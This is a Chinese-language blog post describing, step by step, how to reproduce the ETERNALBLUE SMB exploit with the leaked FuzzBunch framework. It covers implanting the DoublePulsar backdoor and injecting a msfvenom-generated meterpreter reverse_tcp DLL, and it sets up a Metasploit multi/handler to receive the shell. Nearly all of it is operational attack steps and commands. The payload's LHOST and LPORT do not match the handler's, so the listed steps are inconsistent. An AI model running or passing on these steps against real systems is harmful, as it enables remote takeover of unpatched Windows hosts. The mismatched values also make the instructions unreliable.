美文网首页
方程式0day ETERNALBLUE 复现过程

方程式0day ETERNALBLUE 复现过程

作者: __周__ | 来源:发表于2018-02-27 09:06 被阅读0次

    环境:


    去github上把需要脚本下载下来,解压到桌面上,然后设置python的环境变量,再运行fb.py,再次之前要在当前目录下配置一个名为listeningposts的目录,否则会报错

    • 成功执行fb.py的界面为


      图片.png

    -首先会让你输入目标机器的ip地址;本地ip


    图片.png
    • 询问是否重定向,选否
    图片.png
    • 选择基本日志目录,输入no(由于我这里已经复现过一次,所以这里显示有test)


      图片.png

    -这里我直接选择0进入test,如果没有test项目,可以选择另一个创建一个新的项目

    图片.png
    • 然后下一步就默认回车
    图片.png
    • 使用永恒之蓝的模块
    图片.png
    • 下面的默认回车


      1.png
      2.png
    • 选择目标机器的系统,选择1

    图片.png
    • 选择fuzzbunch
    图片.png
    • 然后下面几个默认回车
    图片.png
    • 在目标机器对应的SMB端口植入一个名为DoublePulsar的后门程序
    图片.png
    • 然后默认回车。。。
    图片.png
    • 下面的这个选择 SMB,再下面的选择操作系统版本这里选择64位
    图片.png
    • 下一步选择 运行全部 2


      图片.png

    接下来需要从kali中生成一个.dll的payload,供其使用,将生成出来的dll放到攻击机win7下

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.11.119 LPORT=4444 -f dll > s.dll
    
    图片.png
    • 然后把生成的dll文件导入到工具中


      图片.png
    • 然后又是默认敲回车

    图片.png 图片.png
    • 接下来去kali里面配置msf
    use exploit/multi/handler
    set LHOST 192.168.11.122
    set LPORT 5555
    set PAYLOAD windows/x64/meterpreter/reverse_tcp
    exploit
    

    之后就可以坐等shell上门啦

    相关文章

      网友评论

          本文标题:方程式0day ETERNALBLUE 复现过程

          本文链接:https://www.haomeiwen.com/subject/cunozxtx.html